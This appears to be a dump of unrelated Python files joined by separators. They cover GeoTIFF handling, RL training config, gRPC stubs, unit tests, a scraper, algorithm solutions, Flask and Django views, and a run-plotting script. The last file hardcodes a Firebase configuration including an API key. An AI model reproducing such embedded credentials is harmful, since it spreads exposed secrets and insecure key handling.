Creates new GeoTIFF object from existing: new data, same georeference.
Arguments:
newpath: valid file path
newdata: numpy array, 2 or 3-dim
Returns:
A raster.GeoTIFF object
"""
# convert Numpy dtype objects to GDAL type codes
# see https://gist.github.com/chryss/8366492
NPDTYPE2GDALTYPECODE = {
"uint8": 1,
"int8": 1,
"uint16": 2,
"int16": 3,
"uint32": 4,
"int32": 5,
"float32": 6,
"float64": 7,
"complex64": 10,
"complex128": 11,
}
# check if newpath is potentially a valid file path to save data
dirname, fname = os.path.split(newpath)
if dirname:
if not os.path.isdir(dirname):
print("%s is not a valid directory to save file to " % dirname)
if os.path.isdir(newpath):
LOGGER.warning(
"%s is a directory." % dirname + " Choose a name "
+ "that is suitable for writing a dataset to.")
if (newdata.shape != self.data.shape
and newdata.shape != self.data[0, ...].shape):
raise RasterError(
"New and cloned GeoTIFF dataset must be the same shape.")
dims = newdata.ndim
if dims == 2:
bands = 1
elif dims > 2:
bands = newdata.shape[0]
else:
raise RasterError(
"New data array has only %s dimensions." % dims)
try:
LOGGER.info(newdata.dtype.name)
LOGGER.info(NPDTYPE2GDALTYPECODE)
LOGGER.info(NPDTYPE2GDALTYPECODE[newdata.dtype.name])
gdaltype = NPDTYPE2GDALTYPECODE[newdata.dtype.name]
except KeyError as err:
raise RasterError(
"Data type in array %s " % newdata.dtype.name
+ "cannot be converted to GDAL data type: \n%s" % err.message)
proj = self.projection
geotrans = self._gtr
gtiffdr = gdal.GetDriverByName('GTiff')
gtiff = gtiffdr.Create(newpath, self.ncol, self.nrow, bands, gdaltype)
gtiff.SetProjection(proj)
gtiff.SetGeoTransform(geotrans)
if dims == 2:
gtiff.GetRasterBand(1).WriteArray(newdata)
else:
for idx in range(dims):
gtiff.GetRasterBand(idx+1).WriteArray(newdata[idx, :, :])
gtiff = None
return GeoTIFF(newpath)
|
'''
Copyright (c) 2019, Ameer Haj Ali (UC Berkeley), and Intel Corporation
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
import ray
import ray.tune as tune
from ray.rllib.agents import ppo
from envs.neurovec import NeuroVectorizerEnv
from my_model import Code2VecModel
from ray.rllib.models import ModelCatalog
from ray.tune.registry import register_env
ray.init()
ModelCatalog.register_custom_model("my_model",Code2VecModel)
register_env("autovec", lambda config:NeuroVectorizerEnv(config))
tune.run_experiments({
"NeuroVectorizer": {
#"restore": "/Users/ameerh/Berkeley_Drive/PhD_berkeley/llvm-project/build/rlvectorizer/PPO_BanditEnv_0_2019-08-03_01-10-43lnjy3yyo/checkpoint_240/checkpoint-240",
"checkpoint_freq":1,
"run": "PPO",
"env": NeuroVectorizerEnv,
"stop": {"episodes_total": 500000},
"config": {
#"observation_filter": "NoFilter",
#"sample_batch_size": 10,
# "eager":True,
#"train_batch_size": 10,
#"sgd_minibatch_size": 10,
#"num_sgd_iter":3,
#"lr":5e-5,
#"vf_loss_coeff":0.5,
"horizon": 1,
"num_gpus": 0,
"model":{"custom_model": "my_model"},
"num_workers": 1,
"env_config":{'dirpath':'./training_data','new_rundir':'./new_garbage'}
},
},
})
|
infile=open('alienin.txt','r')
n,w=map(int,infile.readline().split())
list1=[]
for i in range(n):
p=int(infile.readline())
list1.append(p)
i,j=0,0
index=0
currentp=0
answer=0
while i<n:
while index<w and j<n:
index=(list1[j]-list1[i])
if index<w:
currentp+=1
j+=1
if currentp>answer:
answer=max(answer,currentp)
index=0
i+=1
outfile=open('alienout.txt','w')
outfile.write(str(answer))
outfile.close()
|
import json
from player_stats_url import stats_url, top_50_url
class PriceData:
def __init__(self, web_object):
print('Getting player price change data...')
self.web_object = web_object
self.price_data_url = self.find_price_data_url()
self.player_price_data = self.get_player_price_data()
self.player_stats_data = self.get_player_stats_data()
self.player_top_50_data = self.get_top_50_data()
def find_price_data_url(self):
self.web_object.driver.get('http://www.fplstatistics.co.uk/')
browser_log = self.web_object.driver.get_log('performance')
events = [json.loads(entry['message'])['message'] for entry in browser_log]
events = [event for event in events if 'Network.response' in event['method']]
for event in events:
if 'response' in event['params']:
if 'http://www.fplstatistics.co.uk/Home/AjaxPrices' in event['params']['response']['url']:
return event['params']['response']['url']
def get_player_stats_data(self):
return json.loads(self.web_object.session.get(stats_url).text)['aaData']
def get_top_50_data(self):
return json.loads(self.web_object.session.get(top_50_url).text)['aaData']
def get_player_price_data(self):
return json.loads(self.web_object.session.get(self.price_data_url).text)['aaData']
|
# Copyright 2014 PerfKitBenchmarker Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import unittest
from perfkitbenchmarker import sample
from six.moves import range
class SampleTestCase(unittest.TestCase):
def testMetadataOptional(self):
instance = sample.Sample(metric='Test', value=1.0, unit='Mbps')
self.assertDictEqual({}, instance.metadata)
def testProvidedMetadataSet(self):
metadata = {'origin': 'unit test'}
instance = sample.Sample(metric='Test', value=1.0, unit='Mbps',
metadata=metadata.copy())
self.assertDictEqual(metadata, instance.metadata)
class TestPercentileCalculator(unittest.TestCase):
def testPercentileCalculator(self):
numbers = list(range(0, 1001))
percentiles = sample.PercentileCalculator(numbers,
percentiles=[0, 1, 99.9, 100])
self.assertEqual(percentiles['p0'], 0)
self.assertEqual(percentiles['p1'], 10)
self.assertEqual(percentiles['p99.9'], 999)
self.assertEqual(percentiles['p100'], 1000)
self.assertEqual(percentiles['average'], 500)
# 4 percentiles we requested, plus average and stddev
self.assertEqual(len(percentiles), 6)
def testNoNumbers(self):
with self.assertRaises(ValueError):
sample.PercentileCalculator([], percentiles=[0, 1, 99])
def testOutOfRangePercentile(self):
with self.assertRaises(ValueError):
sample.PercentileCalculator([3], percentiles=[-1])
def testWrongTypePercentile(self):
with self.assertRaises(ValueError):
sample.PercentileCalculator([3], percentiles=['a'])
if __name__ == '__main__':
unittest.main()
|
class Skier:
def __init__(self, length, age, style):
self.length = length
self.age = age
self.style = style
classic = 'classic'
freestyle = 'freestyle'
_MAX_SUPPORTED_CLASSIC_SKI_LENGTH = 207
def calculate_ski_length(skier):
if skier.age <= 4:
return _calculate_baby_ski_length(skier)
if skier.age <= 8:
return _calculate_child_ski_length(skier)
if skier.style == Skier.classic:
return _calculate_classic_ski_length(skier)
if skier.style == Skier.freestyle:
return _calculate_freestyle_ski_length(skier)
raise ValueError(f"Ski style {skier.style} is unsupported")
def _calculate_baby_ski_length(skier):
return (skier.length, skier.length)
def _calculate_child_ski_length(skier):
return (skier.length + 10, skier.length + 20)
def _calculate_classic_ski_length(skier):
ski_length_min, ski_length_max = (skier.length + 20, skier.length + 20)
if ski_length_max > _MAX_SUPPORTED_CLASSIC_SKI_LENGTH:
raise ValueError(f"Calculated classic ski length is {ski_length_max}, "
"max supported length is {_MAX_SUPPORTED_CLASSIC_SKI_LENGTH}")
return ski_length_min, ski_length_max
def _calculate_freestyle_ski_length(skier):
return (skier.length + 10, skier.length + 15)
|
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
"""Client and server classes corresponding to protobuf-defined services."""
import grpc
from yandex.cloud.cdn.v1 import origin_pb2 as yandex_dot_cloud_dot_cdn_dot_v1_dot_origin__pb2
from yandex.cloud.cdn.v1 import origin_service_pb2 as yandex_dot_cloud_dot_cdn_dot_v1_dot_origin__service__pb2
from yandex.cloud.operation import operation_pb2 as yandex_dot_cloud_dot_operation_dot_operation__pb2
class OriginServiceStub(object):
"""
Origin management service.
Origin is not a standalone entity. It can live only within origin group.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.Get = channel.unary_unary(
'/yandex.cloud.cdn.v1.OriginService/Get',
request_serializer=yandex_dot_cloud_dot_cdn_dot_v1_dot_origin__service__pb2.GetOriginRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_cdn_dot_v1_dot_origin__pb2.Origin.FromString,
)
self.List = channel.unary_unary(
'/yandex.cloud.cdn.v1.OriginService/List',
request_serializer=yandex_dot_cloud_dot_cdn_dot_v1_dot_origin__service__pb2.ListOriginsRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_cdn_dot_v1_dot_origin__service__pb2.ListOriginsResponse.FromString,
)
self.Create = channel.unary_unary(
'/yandex.cloud.cdn.v1.OriginService/Create',
request_serializer=yandex_dot_cloud_dot_cdn_dot_v1_dot_origin__service__pb2.CreateOriginRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.Update = channel.unary_unary(
'/yandex.cloud.cdn.v1.OriginService/Update',
request_serializer=yandex_dot_cloud_dot_cdn_dot_v1_dot_origin__service__pb2.UpdateOriginRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.Delete = channel.unary_unary(
'/yandex.cloud.cdn.v1.OriginService/Delete',
request_serializer=yandex_dot_cloud_dot_cdn_dot_v1_dot_origin__service__pb2.DeleteOriginRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
class OriginServiceServicer(object):
"""
Origin management service.
Origin is not a standalone entity. It can live only within origin group.
"""
def Get(self, request, context):
"""Get origin in origin group.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def List(self, request, context):
"""Lists origins of origin group.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Create(self, request, context):
"""Creates origin inside origin group.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Update(self, request, context):
"""Updates origin from origin group.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Delete(self, request, context):
"""Deletes origin from origin group.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_OriginServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'Get': grpc.unary_unary_rpc_method_handler(
servicer.Get,
request_deserializer=yandex_dot_cloud_dot_cdn_dot_v1_dot_origin__service__pb2.GetOriginRequest.FromString,
response_serializer=yandex_dot_cloud_dot_cdn_dot_v1_dot_origin__pb2.Origin.SerializeToString,
),
'List': grpc.unary_unary_rpc_method_handler(
servicer.List,
request_deserializer=yandex_dot_cloud_dot_cdn_dot_v1_dot_origin__service__pb2.ListOriginsRequest.FromString,
response_serializer=yandex_dot_cloud_dot_cdn_dot_v1_dot_origin__service__pb2.ListOriginsResponse.SerializeToString,
),
'Create': grpc.unary_unary_rpc_method_handler(
servicer.Create,
request_deserializer=yandex_dot_cloud_dot_cdn_dot_v1_dot_origin__service__pb2.CreateOriginRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'Update': grpc.unary_unary_rpc_method_handler(
servicer.Update,
request_deserializer=yandex_dot_cloud_dot_cdn_dot_v1_dot_origin__service__pb2.UpdateOriginRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'Delete': grpc.unary_unary_rpc_method_handler(
servicer.Delete,
request_deserializer=yandex_dot_cloud_dot_cdn_dot_v1_dot_origin__service__pb2.DeleteOriginRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'yandex.cloud.cdn.v1.OriginService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class OriginService(object):
"""
Origin management service.
Origin is not a standalone entity. It can live only within origin group.
"""
@staticmethod
def Get(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.cdn.v1.OriginService/Get',
yandex_dot_cloud_dot_cdn_dot_v1_dot_origin__service__pb2.GetOriginRequest.SerializeToString,
yandex_dot_cloud_dot_cdn_dot_v1_dot_origin__pb2.Origin.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def List(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.cdn.v1.OriginService/List',
yandex_dot_cloud_dot_cdn_dot_v1_dot_origin__service__pb2.ListOriginsRequest.SerializeToString,
yandex_dot_cloud_dot_cdn_dot_v1_dot_origin__service__pb2.ListOriginsResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Create(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.cdn.v1.OriginService/Create',
yandex_dot_cloud_dot_cdn_dot_v1_dot_origin__service__pb2.CreateOriginRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Update(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.cdn.v1.OriginService/Update',
yandex_dot_cloud_dot_cdn_dot_v1_dot_origin__service__pb2.UpdateOriginRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Delete(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.cdn.v1.OriginService/Delete',
yandex_dot_cloud_dot_cdn_dot_v1_dot_origin__service__pb2.DeleteOriginRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
|
# 2021 June 4 14:44
# The solution is based on a rather magical algorithm called:
# Reservoir Sampling
# Naturally, we'd think of traversing over the entire linked-list, and get to
# know the enire length. Random sample and then traverse again to get the
# element. Or else store the elements in a list. But these makes it either not a
# "one-pass" solution, or requires additional space.
#
# Without traversing the entire list FIRST (which eventually the algo will), we
# won't know the number N beforehand. The data comes like a stream, you process
# it as you see it.
#
# Reservoir Sampling:
# Suppose we have a stream a, b, c, d, e, f.
# As we see a, we have a 1/1 probability of recording it as an POTENTIAL
# answer.
# As we then see b, we have a 1/2 probability of recording b. This makes the
# record remains A to have also 1/2 probability. PROBABILITY IS EQUAL FOR ALL
# ELEMENTS WE HAVE SEEN SO FAR.
# Then we see c, 1/3 probability that we record it. This makes the prob of
# A staying on the record to be 2/3*1/2= 1/3. Similarly for B it's also 1/3.
# Probabilities are still equal!
#
# For the mth element, we want a 1/m probability to set it as a record. Then
# the prob for any of the previous elements would be (m-1)/m*1/(m-1) = 1/m.
# It goes like this till the end of the linked list.
from random import randint
class Solution:
def __init__(self, head: ListNode):
"""
@param head The linked list's head.
Note that the head is guaranteed to be not null, so it contains at least one node.
"""
self.head = head
def getRandom(self) -> int:
"""
Returns a random node's value.
"""
cur = self.head
m = 0
ans = 0
while cur:
rnd = randint(0, m)
if rnd == 0:
ans = cur.val
cur = cur.next
m += 1
return ans
# Your Solution object will be instantiated and called as such:
# obj = Solution(head)
# param_1 = obj.getRandom()
|
from .inlined_async import Async
def add(x, y):
return x+y
def test():
r = yield Async(add, (2, 3))
print(r)
r = yield Async(add, ('youm3sh'))
print(r)
for n in range(10):
r = yield Async(add, (n, n))
print(r)
# My work done now deploy it Manish
print('Goodbye')
|
"""
=============
Маршрутизация
=============
Модуль routing отвечает за маршрутизацию запросов от пользователя в приложении.
Маршруты разбиты на файлы по функциям:
fakeDataRoutes - генерация фейковых данных
plansRoutes - работа с планами
profileRoutes - работа с профилями
registrationRoutes - авторизация и регистрация пользователей
reportRoutes - работа с PDF-отчётам
tokenRoutes - выдача токенов
userListRoutes - работа со списком пользователей
"""
from flask import render_template
from flask_login import login_required
from app import app
# noinspection PyUnresolvedReferences
from app.routing import fakeDataRoutes, plansRoutes, profileRoutes, registrationRoutes, reportRoutes, userListRoutes,\
tokenRoutes
from app.api.users import get_current_profile
from app.routing.userTypeDecorators import admin_required
# Главная страница
@app.route('/')
@app.route('/index')
@app.route('/tpindex')
@login_required
def index():
return render_template('index.html', title='Главная', user=get_current_profile())
# Логи
@app.route('/logs')
@login_required
@admin_required
def logs():
return render_template('logs.html', title='Логи', user=get_current_profile())
|
#!/usr/bin/env python3
# This program plots a three dimensional graph representing a runner's
# performance vs time and length of run. Input is an activity file downloaded
# from connect.garmin.com.
# FIXME: Runs.load() excludes runs whose distance and pace fall outside
# a given range. See "Exclude outliers" comment below. These limits should
# probably be command-line arugments that override defaults.
from mpl_toolkits import mplot3d
import numpy as np
import matplotlib.pyplot as plt
from matplotlib import cm
#from matplotlib.ticker import LinearLocator, FormatStrFormatter
import argparse
import datetime
from datetime import date
#============================================================================
# Globals
version = 4
#Input file field index values.
TYPE = 0
TIME_STAMP = 1
DISTANCE = 4
TIME = 6
#============================================================================
# Classes
# A class to hold a run event.
class Event:
def __init__(self, _timeStamp, _distance, _pace):
self.timeStamp = _timeStamp # date.
self.day = 0 # Day count from first run.
self.distance = _distance # In miles.
self.pace = _pace # In minutes per mile.
# A class to hold all the runs.
class Runs:
def __init__(self):
self.inputEvents = np.array([], dtype = Event)
self.day = []
self.distance = []
self.pace = []
def length(self):
return len(self.inputEvents)
# For each run in the file at path, load date, distance and pace. Pace is
# computed from distance and time.
def load(self, path):
values = []
self.__init__()
with open(path) as inputFile:
# Skip the header line.
inputFile.readline()
for line in inputFile:
text = self.removeQuotesAndCommas(line)
values = text.split(',')
# Load only running events.
if values[TYPE] == 'Running':
# From values, get date, distance in miles.
runDate = date.fromisoformat(values[TIME_STAMP].split()[0])
runDistance = float(values[DISTANCE])
# To get run pace, first convert time (hh:mm:ss) to minutes, then
# compute pace (minutes/mile).
h, m, s = values[TIME].split(':')
t = 60.0 * float(h) + float(m) + (float(s) / 60.0)
runPace = t / runDistance
# Exclude outliers.
if runDistance >= 2.0 and runDistance <= 27.0 \
and runPace > 4.0 and runPace < 20.0:
self.inputEvents = np.append(self.inputEvents, \
Event(runDate, runDistance, runPace))
# Computer the day numbers.
firstDay = self.inputEvents[len(self.inputEvents) - 1].timeStamp
for event in self.inputEvents:
event.day = (event.timeStamp - firstDay).days
def fitPlane(self):
# Create the arrays needed for the fit.
self.day = []
self.distance = []
self.pace = []
for event in self.inputEvents:
self.day.append(event.day);
self.distance.append(event.distance);
self.pace.append(event.pace);
tmp_A = []
tmp_b = []
for i in range(len(self.day)):
tmp_A.append([self.day[i], self.distance[i], 1])
tmp_b.append(self.pace[i])
b = np.matrix(tmp_b).T
A = np.matrix(tmp_A)
self.fit = (A.T * A).I * A.T *b
errors = b - A * self.fit
residual = np.linalg.norm(errors)
print("solution:")
print(" %f x + %f y + %f = z" %(self.fit[0], self.fit[1], self.fit[2]))
# print("errors:")
# print(" ", errors)
print("residual:")
print(" ", residual)
def plot(self):
fig = plt.figure()
ax = plt.subplot(111, projection = '3d')
ax.scatter(self.day, self.distance, self.pace, color = 'b')
xlim = ax.get_xlim()
ylim = ax.get_ylim()
X, Y = np.meshgrid(np.arange(xlim[0], xlim[1]), \
np.arange(ylim[0], ylim[1]))
Z = np.zeros(X.shape)
for r in range(X.shape[0]):
for c in range(X.shape[1]):
Z[r,c] = self.fit[0] * X[r,c] + self.fit[1] * Y[r,c] + self.fit[2]
ax.plot_wireframe(X, Y, Z, color = 'y')
ax.set_xlabel('Days since ' + \
self.inputEvents[len(self.inputEvents)-1].timeStamp.strftime("%m-%d-%Y"))
ax.set_ylabel('Distance - miles')
ax.set_zlabel('Pace - min/mile')
plt.show()
# Remove commas embedded in quoted strings. Remove quotes from strings.
# Return the modified string.
def removeQuotesAndCommas(self, inputText):
inQuotes = False
outputText = ''
for c in inputText:
if inQuotes:
if c == '"':
inQuotes = False
elif c != ',':
outputText += c
else:
if c == '"':
inQuotes = True
else:
outputText += c
return outputText
#============================================================================
# Functions
def displayVersion():
print("runsPlot version " + str(version))
quit()
#============================================================================
# Main program
parser = argparse.ArgumentParser(description = \
"Plot pace vs time and length of run")
parser.add_argument('inputFile', type = str, help = 'Input file path')
parser.add_argument('-v', '--version', action = 'store_true', \
help = 'Display version and quit')
args = parser.parse_args()
if args.version:
displayVersion()
runs = Runs()
runs.load(args.inputFile)
print("Total number of runs = ", runs.length())
runs.fitPlane()
runs.plot()
|
from django.shortcuts import render
import pyrebase
# Create your views here.
firebaseConfig = {
"apiKey": "AIzaSyDEwWVDdZlXARcUrLvgEfn-goXpgpKf1nU",
"authDomain": "e-voting-f8fd3.firebaseapp.com",
"databaseURL": "https://e-voting-f8fd3-default-rtdb.asia-southeast1.firebasedatabase.app",
"projectId": "e-voting-f8fd3",
"storageBucket": "e-voting-f8fd3.appspot.com",
"messagingSenderId": "799413315988",
"appId": "1:799413315988:web:c164bfd3355d96cd9c4781",
"measurementId": "G-P2ECTV2C5Q"
}
firebase = pyrebase.initialize_app(firebaseConfig)
auth = firebase.auth()
def SignIn(request):
return render(request,"signin.html")
def SignUp(request):
return render(request, "signup.html")
def Authenticate(request):
return render(request, "auth.html")
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.